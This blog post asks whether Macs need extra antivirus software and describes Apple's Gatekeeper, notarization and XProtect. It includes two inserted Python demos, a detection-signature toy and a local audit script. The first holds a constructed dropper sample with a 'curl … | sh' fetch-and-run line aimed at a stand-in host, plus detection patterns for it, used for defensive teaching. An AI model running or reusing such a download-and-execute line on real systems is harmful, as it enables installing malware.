Cyberattacks on macOS - Additional antivirus software necessary?

Cyber attacks have enormous damage potential. They endanger the existence of companies and, in the case of attacks on critical infrastructure such as hospitals or energy suppliers, quickly have a serious impact on the population. Apple is considered secure: but is macOS really immune to cyberattacks? Is additional, often paid, antivirus software a must for extra protection or just a superfluous expense?

In recent years, the frequency and intensity of cyber attacks, for example by means of ransomware or DDoS, have increased significantly. The risk of attacks by highly professional and globally networked perpetrators is growing, putting the security of our digital devices at the top of the worry list. Apple fans are often proud to use macOS, an operating system known for its high standards and reliability.

In this blog post, we'll take a closer look at the question of whether additional antivirus software for macOS is really necessary, or if it's just a money-making strategy. We will explore the risks, the current threats and the different views on the subject to help you make an informed decision about protecting your macOS operating system.

What is a cyber attack?


A cyberattack is a targeted and malicious act that uses digital technologies and networks to access computer systems, data, or infrastructures in order to

  • disrupt,
  • damage,
  • manipulate or
  • steal them.

Cyberattacks can be carried out by individuals, criminal groups, state actors, or other attackers and have the potential to cause significant damage.

Cyberattacks take a variety of forms, including malware infections, phishing attempts, denial-of-service (DDoS) attacks, data leaks and other tactics, which we describe in more detail in our blog post "What cybercrime means".

Cyberattacks on macOS observed by Bitdefender

Cybercriminals are not only targeting Windows users, but also macOS device owners. Trojans, potentially unwanted applications (PUA) and adware also appear on macOS hardware. Although Windows is still attacked more frequently, Apple has nevertheless had to proactively close vulnerabilities in its operating system, Bitdefender reported in August 2023. Bitdefender Labs analyzed global data on the macOS threat landscape in 2022.

The results show that Apple hardware is targeted less often, but is still targeted by cybercriminals, while Windows and Android devices are more attractive to attackers because of their wider distribution.

The main threats to macOS are cyberattacks in the form of Trojans at 51.8 %, potentially unwanted applications (PUA) at 25.3 %, and adware at 22.6 %.

Although devices running macOS are attacked less frequently than Windows computers, they are not immune to malware. Apple had to close security gaps because attackers use social engineering and automated attack techniques against macOS users. At the same time, professional spyware vendors are becoming active on iOS and macOS hardware; iOS shares many key components with macOS, such as the WebKit web rendering engine. Apple has released security updates for critical vulnerabilities, but attacks on macOS hardware are still becoming more efficient. Neglected updates and poor cybersecurity practices by Mac users make criminals' jobs easier.

Trojans are a risk factor and attack systems that are not kept up to date. Neglecting updates poses a concrete danger. Attackers use social engineering via spam, phishing, social media, malvertising or manipulated file downloads from torrent or warez websites.

Cyberattacks designed specifically for macOS often require the victim to launch an executable manually. It is therefore important for cybercriminals to make their malware look like a legitimate application.

One in four threats to macOS is a potentially unwanted application (PUA). Attackers distribute PUAs as freeware, repackaged applications, or utilities (e.g., remote administration, system cleanup, supposed virus scanners, power-saving apps, and disk space management) that can secretly record data or perform cryptomining (8 % of PUAs are cryptominers).

Apple users should not assume that their macOS hardware is safe, even if it is attacked less frequently. A dedicated cybersecurity solution, regular updates and caution with suspicious content are necessary. Downloading files from unofficial sources such as torrents or warez should be avoided.

Connection between cyber attacks and macOS


Especially in recent years, the number of cyberattacks targeting the macOS operating system has increased. Previously, Macs were less targeted by malware authors because Windows systems were a more attractive target due to their prevalence. However, with the rising popularity of Macs, they have become increasingly interesting for cybercriminals.

Security mechanisms such as Gatekeeper and XProtect are vulnerable

Attackers exploit security holes and vulnerabilities to install malware or gain access to the system. Macs come with certain security mechanisms built in, such as Gatekeeper and XProtect, but these do not provide absolute security.

Phishing and social engineering

Many cyberattacks on Mac users occur via phishing emails or fake websites designed to steal sensitive information such as passwords or credit card details. These attacks usually exploit human weakness rather than the macOS operating system directly.

Mac malware

There is malware developed specifically for macOS. Examples are Mac Trojans such as Flashback and MacKeeper. Such malware causes significant damage to Mac systems once they are infected.

Cybercrime and financial motivation

Attackers often have financial goals, and Apple pursues a high-priced product strategy. If cybercriminals conclude that Mac users are, stereotypically, potentially lucrative targets, they will systematically try to carry out cyberattacks tailored to this possibly "well-heeled" target group.

All in all, this shows that Mac users are not completely immune to cyberattacks despite the general security benefits of macOS.

It is therefore important to take appropriate security measures on Mac systems as well. These include regular software updates, the use of antivirus software and a healthy caution towards suspicious emails and websites.

What Apple says about macOS security

"Apple operating system design focuses on security. The design includes a hardware trust anchor that enables secure boot and a secure process for software updates. Apple operating systems also use purpose-built chip-based hardware features that protect against exploits during system operation."

Apple Support

Integrity of the operating system

The built-in features of macOS serve to preserve the integrity of trusted code during its execution. In short, Apple operating systems help defend against attacks, misuse and sabotage attempts, whether they originate from apps, the Internet or other sources. These protections are available on devices with supported Apple silicon, which includes iOS, iPadOS, tvOS, watchOS and now macOS on Mac computers with Apple silicon:

[Image: overview of the built-in operating system integrity features. Source: Apple Support]

Note: The Page Protection Layer (PPL) requires that the platform only executes signed and trusted code. This security model is not applicable to macOS.

Protection against malware with macOS

Apple runs a threat analysis process that quickly detects and blocks malware.

3 levels of defense against malware cyber attacks

The fight against malware in macOS is organized in 3 stages:

  1. Preventing the launch or execution of malware: App Store, or Gatekeeper in combination with notarization
  2. Blocking the execution of malware on customer systems: Gatekeeper, notarization and XProtect
  3. Removal and cleanup of malware that has already executed: XProtect

The first two levels of defense aim to prevent the spread of malware and block its execution, while the third level aims to remove malware that may already be active.

Together - according to Apple's position - these defenses provide comprehensive protection against viruses and malware. Furthermore, additional security measures are available on Mac systems with Apple silicon that can limit the potential damage from malware that has already executed.

Apple's malware scanning service: notarization

Notarization is a service from Apple that checks macOS apps for malware. Developers who want to offer their apps outside the App Store must submit them for scanning in advance. Apple scans the software for known malware threats and issues a notarization ticket if no malware is found. Developers usually attach this ticket to their app so that Gatekeeper (the macOS component that decides whether downloaded software may run) can verify and run it, even if the device is offline.

In addition, Apple can issue blocking tickets for apps that are found to be malicious, even if they were previously notarized. macOS regularly checks for new blocking tickets so that Gatekeeper always has up-to-date information and blocks the launch of such apps, ideally before any harm is done. This process makes it possible to react quickly to malicious apps, since these background updates are performed much more frequently than updates for new XProtect signatures.

XProtect for macOS is supposed to protect against cyber attacks

macOS has built-in antivirus technology called XProtect that detects and removes malware based on signatures. These signatures are updated regularly by Apple and are based on YARA, a tool for signature-based malware detection. Apple continuously monitors new malware threats and, as of today (09/2023), updates the signatures automatically without requiring system updates, in order to protect Macs from malware. XProtect automatically detects and blocks the installation of unknown malware.

In macOS 10.15 and later, XProtect checks for known malicious content whenever

  • an app is launched for the first time,
  • an app has been changed in the file system, or
  • XProtect signatures have been updated.

If XProtect detects known malware, the app is blocked, the user is notified and should then move the app to the trash.

According to Apple, notarization is effective against known files or file hashes and can also be applied to apps that have already been launched. XProtect's signature-based rules, on the other hand, can also detect variants of malware that are not yet known.
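The difference between the two mechanisms is easiest to see side by side. The following Python script is an added example, not Apple's code or part of the original post: it models a hash-keyed blocklist (what a revocation ticket for a known file amounts to) next to a minimal YARA-style rule engine (the XProtect approach). The rule syntax is a small subset modelled on YARA, and the "binaries" and the rule are constructed byte strings and patterns, not real malware or real XProtect signatures.

```python
"""
Hash blocklist vs. YARA-style signature rule, a toy model of the distinction
between notarization revocation (exact known files) and XProtect rules
(patterns that also catch unseen variants). Added example, not Apple's code.
"""
from __future__ import annotations

import hashlib
import re
from dataclasses import dataclass

# Constructed sample of a fake dropper: a few characteristic strings such
# malware tends to carry. These are just bytes for the demo, not real malware.
KNOWN_SAMPLE = (
    b"\xcf\xfa\xed\xfe"  # Mach-O 64-bit magic, for flavour only
    b" /usr/bin/curl -s http://constructed.invalid/payload | sh "
    b" osascript 'with administrator privileges' "
    b" com.constructed.fake.launchagent "
)

# A variant with identical behaviour: one command padded with an extra space,
# which is enough to change every file hash.
VARIANT_SAMPLE = KNOWN_SAMPLE.replace(b"curl -s", b"curl  -s")

# Something harmless that shares none of the indicators.
BENIGN_SAMPLE = b"\xcf\xfa\xed\xfe Hello, world. com.constructed.benign.app"


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Model of a hash-keyed blocklist: one entry per file Apple has actually seen.
REVOKED_HASHES = {sha256(KNOWN_SAMPLE)}


def blocked_by_hash(data: bytes) -> bool:
    """Exact-match check, like a revocation ticket issued for a known file."""
    return sha256(data) in REVOKED_HASHES


@dataclass
class Rule:
    """Minimal YARA-like rule: named byte patterns plus an 'N of them' condition."""
    name: str
    strings: dict[str, bytes]  # $identifier -> regex over bytes
    min_matches: int

    def matches(self, data: bytes) -> bool:
        hits = sum(1 for pattern in self.strings.values() if re.search(pattern, data))
        return hits >= self.min_matches


# Constructed rule: patterns are written tolerant of whitespace and host
# changes, so they survive trivial edits that defeat a hash lookup.
FAKE_DROPPER_RULE = Rule(
    name="Constructed_MacDropper_A",
    strings={
        "$curl_pipe_sh": rb"curl\s+-s\s+http://[^\s|]+\s*\|\s*sh",
        "$admin_prompt": rb"with administrator privileges",
        "$agent_label": rb"com\.constructed\.fake\.launchagent",
    },
    min_matches=2,  # require two independent indicators before flagging
)

RULESET = (FAKE_DROPPER_RULE,)


def scan(data: bytes, rules=RULESET) -> list[str]:
    """Names of the rules that fire on the given bytes."""
    return [rule.name for rule in rules if rule.matches(data)]


def assess(data: bytes) -> dict:
    """Both mechanisms side by side, the way the text compares them."""
    return {"hash_blocked": blocked_by_hash(data), "signature_hits": scan(data)}


if __name__ == "__main__":
    for label, sample in (("known", KNOWN_SAMPLE), ("variant", VARIANT_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(f"{label:8s} {assess(sample)}")
```

Running it shows the known sample stopped by both mechanisms, the one-byte variant slipping past the hash blocklist but still caught by the rule, and the benign file untouched by either. The `min_matches` threshold is the usual trade-off in signature writing: a single generic string (a `curl | sh` pipeline) would also hit legitimate installers, so the rule demands two indicators together.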

"XProtect only scans apps that have been modified or are launched for the first time."

Apple Support

Nevertheless, should malware appear on a Mac, XProtect offers the ability to clean it up. It includes an engine that removes infections based on updates that Apple delivers automatically as part of the system data files and security updates. XProtect removes malware as soon as updated information is available and regularly checks for infections. Note that XProtect does not automatically restart the Mac.

Automatic XProtect security updates

Apple automatically releases updates for XProtect based on the latest information about current threats. By default, macOS checks for such updates daily. Notarization updates are deployed via CloudKit synchronization and occur much more frequently.
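Whether these built-in defences are actually active and current on a given Mac is something an administrator can check locally. The following Python script is an added example, not Apple tooling or part of the original post: its parse_* functions decode the output of `spctl --status`, the XProtect bundle's Info.plist and a file's `com.apple.quarantine` attribute, and run_checks() gathers the live values on a Mac. Assumptions: the XProtect bundle lives at the path used by macOS 10.15 and later, and the quarantine attribute keeps its usual "flags;hex-epoch;agent;uuid" layout. The sample strings at the bottom are constructed, so the parsers can be exercised on any system.

```python
"""
Local audit of macOS built-in defences: Gatekeeper assessment state, installed
XProtect signature version, and the quarantine attribute on a downloaded file.
Added example, not Apple tooling; paths and formats are assumptions noted inline.
"""
from __future__ import annotations

import datetime as dt
import pathlib
import plistlib
import shutil
import subprocess

# Assumed location of the signature bundle on macOS 10.15 and later.
XPROTECT_INFO = pathlib.Path(
    "/Library/Apple/System/Library/CoreServices/XProtect.bundle/Contents/Info.plist"
)


def parse_spctl_status(output: str) -> bool:
    """`spctl --status` prints 'assessments enabled' when Gatekeeper is on."""
    return "assessments enabled" in output


def parse_xprotect_version(plist_bytes: bytes) -> str:
    """CFBundleShortVersionString of XProtect.bundle, e.g. '2170'. It rises with
    every signature update, so a value that never changes means updates are not landing."""
    return str(plistlib.loads(plist_bytes)["CFBundleShortVersionString"])


def parse_quarantine(value: str) -> dict:
    """Decode com.apple.quarantine ('flags;hex-epoch-seconds;agent;uuid').
    The attribute's presence is what triggers the first-launch assessment."""
    parts = value.strip().split(";")
    if len(parts) < 3:
        raise ValueError(f"unexpected quarantine value: {value!r}")
    downloaded = dt.datetime.fromtimestamp(int(parts[1], 16), tz=dt.timezone.utc)
    return {
        "flags": int(parts[0], 16),
        "downloaded_at": downloaded.isoformat(),
        "agent": parts[2],  # application that downloaded the file, e.g. Safari
        "uuid": parts[3] if len(parts) > 3 else "",
    }


def _run(cmd: list[str]) -> str:
    proc = subprocess.run(cmd, capture_output=True, text=True, check=False)
    return proc.stdout + proc.stderr


def run_checks(downloaded_file: str | None = None) -> dict:
    """Live checks; a key is simply absent when this host cannot answer it."""
    result: dict = {}
    if shutil.which("spctl"):
        result["gatekeeper_enabled"] = parse_spctl_status(_run(["spctl", "--status"]))
    if XPROTECT_INFO.exists():
        result["xprotect_version"] = parse_xprotect_version(XPROTECT_INFO.read_bytes())
    if downloaded_file and shutil.which("xattr"):
        out = _run(["xattr", "-p", "com.apple.quarantine", downloaded_file])
        result["quarantine"] = parse_quarantine(out) if ";" in out else None
    return result


# Constructed samples (not captured from a real machine) so the parsers can be
# exercised on any system.
SAMPLE_SPCTL_ON = "assessments enabled\n"
SAMPLE_SPCTL_OFF = "assessments disabled\n"
SAMPLE_XPROTECT_PLIST = plistlib.dumps(
    {"CFBundleIdentifier": "com.apple.XProtect", "CFBundleShortVersionString": "2170"}
)
SAMPLE_QUARANTINE = "0083;64f1c0a0;Safari;CONSTRUCTED-UUID"

if __name__ == "__main__":
    print("gatekeeper on (sample):", parse_spctl_status(SAMPLE_SPCTL_ON))
    print("xprotect version (sample):", parse_xprotect_version(SAMPLE_XPROTECT_PLIST))
    print("quarantine (sample):", parse_quarantine(SAMPLE_QUARANTINE))
    print("live:", run_checks())
```

On a Mac, run_checks("~/Downloads/some-installer.dmg") with a real path reports all three values; a missing `gatekeeper_enabled` or a `quarantine` of None is itself a finding worth following up, since a disabled assessment or a stripped quarantine attribute means the first-launch check described above never happens.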

Apple's response to the discovery of new malware

When new malware is detected, several steps are possible:

  1. The developer certificates associated with the malware are revoked.
  2. Notarization issues blocking tickets for all files (apps and associated files) related to the malware.
  3. XProtect signatures are developed and published to detect the malware.

These signatures are also applied to already notarized software, so that apps that are already installed are scanned for the malware as well. Detection of malware then triggers a series of actions over the following seconds, hours and days to ensure the best possible protection for Mac users.

Prevention protects better against cyber attacks than additional antivirus software

As with all new fraud scenarios, the best protection lies in prevention. Security teams should constantly review and update the technical and organizational security measures in their enterprise to keep pace with the ongoing innovations of cybercriminals. AI-based threat analysis tools and risk assessments help to minimize risk in advance with technical means.

At the same time, it is important to educate employees about current attack tactics, raise their awareness of them, and provide them with tools to detect, report and defend against attacks. The same applies to the security teams themselves: through regular training, they can continuously reduce security risks and, despite all precautions, respond quickly in the event of an attack (source: 2023 Cyber Attacks Report by SoSafe).

Conclusion - cyber attacks on macOS operating system

The question of whether additional antivirus software on macOS is necessary or pure money-making by the respective providers is complex and requires a differentiated view. Although the macOS operating system is considered more secure than some other operating systems, it is not completely immune to attacks. In recent years, more cyberattacks on macOS devices have been observed: a clear indication that this platform is also at risk.

Overall, the decision for or against additional antivirus software on macOS depends on various factors. While macOS has some built-in security mechanisms, additional security solutions can be useful in certain scenarios, especially when users' behavior puts them at a higher risk for cyberattacks. Ultimately, the decision should be based on an informed risk assessment and the individual needs and habits of the user.

Do you have questions about cyberattacks or antivirus software for macOS?

Write us a message. Our experts will contact you in a timely manner.

Charlotte Goetz